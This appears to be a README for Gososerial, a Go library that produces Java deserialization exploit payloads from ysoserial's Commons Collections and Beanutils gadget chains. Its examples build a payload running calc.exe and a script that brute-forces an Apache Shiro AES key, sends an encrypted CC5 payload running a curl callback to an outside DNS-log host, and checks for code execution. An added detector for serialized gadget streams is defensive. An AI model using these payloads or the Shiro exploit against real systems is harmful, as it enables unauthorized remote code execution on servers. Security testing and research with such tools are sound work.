Dynamically Generates Ysoserial's Payload by Golang

Gososerial

Introduction

  • ysoserial is a well-known tool for Java deserialization security

  • No Java environment is required, and there is no need to download the ysoserial.jar file

  • Enter the command to obtain the payload directly, which is convenient for writing security tools

  • Currently supports CommonsCollections1-7 (CC1-CC7), K1-K4 and CommonsBeanutils1 (CB1)

Example

[Screenshots not preserved: CommonsCollections1 payload; list of supported chains]

Quick Start

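go get github.com/EmYiQing/Gososerial

package main

import gososerial "github.com/EmYiQing/Gososerial"

func main() {
	// Build the CommonsCollections1 payload for the given command
	payload := gososerial.GetCC1("calc.exe")
	// ...
	// sendPayload is the caller's own function and is not defined here
	sendPayload(payload)
	// ...
}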

Example

func main() {
	// Shiro Scan Code
	target := "http://shiro_ip/"
	// Brute-force the Shiro AES key
	key := shiro.CheckShiroKey(target)
	if key != "" {
		log.Info("find key: %s", key)
	}
	// Use CommonsCollections5 Payload
	var payload []byte
	payload = gososerial.GetCC5("curl xxxxx.ceye.io")
	// Send Cookies Encrypted By AES
	shiro.SendPayload(key, payload, target)
	// Receive Results Using Dnslog API
	if ceye.CheckResult("your_ceye_token") {
		log.Info("find shiro!")
	}
}
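
Every chain listed above yields a Java serialization stream, so such output can be recognised by its stream header and the gadget class names it carries. The Go check below is an added example, not part of Gososerial; `InspectBlob`, `constructedSample` and the marker list are assumptions made for illustration, and the sample input is constructed and is not a working payload.

```go
package main

import (
	"bytes"
	"encoding/base64"
	"fmt"
)

// Java Object Serialization Stream header: STREAM_MAGIC 0xACED, STREAM_VERSION 0x0005.
var javaMagic = []byte{0xAC, 0xED, 0x00, 0x05}

// Class-name markers seen in Commons Collections / Commons Beanutils gadget
// chains (a short list assumed for this example, not exhaustive).
var gadgetMarkers = []string{
	"org.apache.commons.collections.functors.",
	"org.apache.commons.collections4.functors.",
	"org.apache.commons.beanutils.BeanComparator",
	"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl",
}

// InspectBlob reports whether data (raw or base64) is a Java serialization
// stream and which gadget markers appear in it.
func InspectBlob(data []byte) (isJava bool, hits []string) {
	raw := data
	if dec, err := base64.StdEncoding.DecodeString(string(bytes.TrimSpace(data))); err == nil {
		raw = dec // serialized objects often travel base64-encoded ("rO0AB...")
	}
	if !bytes.HasPrefix(raw, javaMagic) {
		return false, nil
	}
	for _, m := range gadgetMarkers {
		if bytes.Contains(raw, []byte(m)) {
			hits = append(hits, m)
		}
	}
	return true, hits
}

// constructedSample builds a harmless fragment: header, TC_OBJECT (0x73),
// TC_CLASSDESC (0x72), then a length-prefixed class name. Not a working payload.
func constructedSample(className string) []byte {
	b := append([]byte{}, javaMagic...)
	b = append(b, 0x73, 0x72, byte(len(className)>>8), byte(len(className)))
	return append(b, className...)
}

func main() {
	s := constructedSample("org.apache.commons.collections.functors.InvokerTransformer")
	fmt.Println(InspectBlob([]byte(base64.StdEncoding.EncodeToString(s))))
}
```

Where the transport encrypts the object, as with the AES-encrypted cookie in the Shiro example, these markers are not visible on the wire and the check has to run after decryption.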

About

Based on the code by P (phith0n) in xray

ysoserial: https://github.com/frohoff/ysoserial

xray: https://github.com/chaitin/xray

phith0n: https://github.com/phith0n

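Disclaimer

Using Gososerial to attack targets without authorization is illegal.

This program should be used only for authorized security testing and research purposes.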

Owner
4ra1n
Web Security Researcher / Student of NCEPU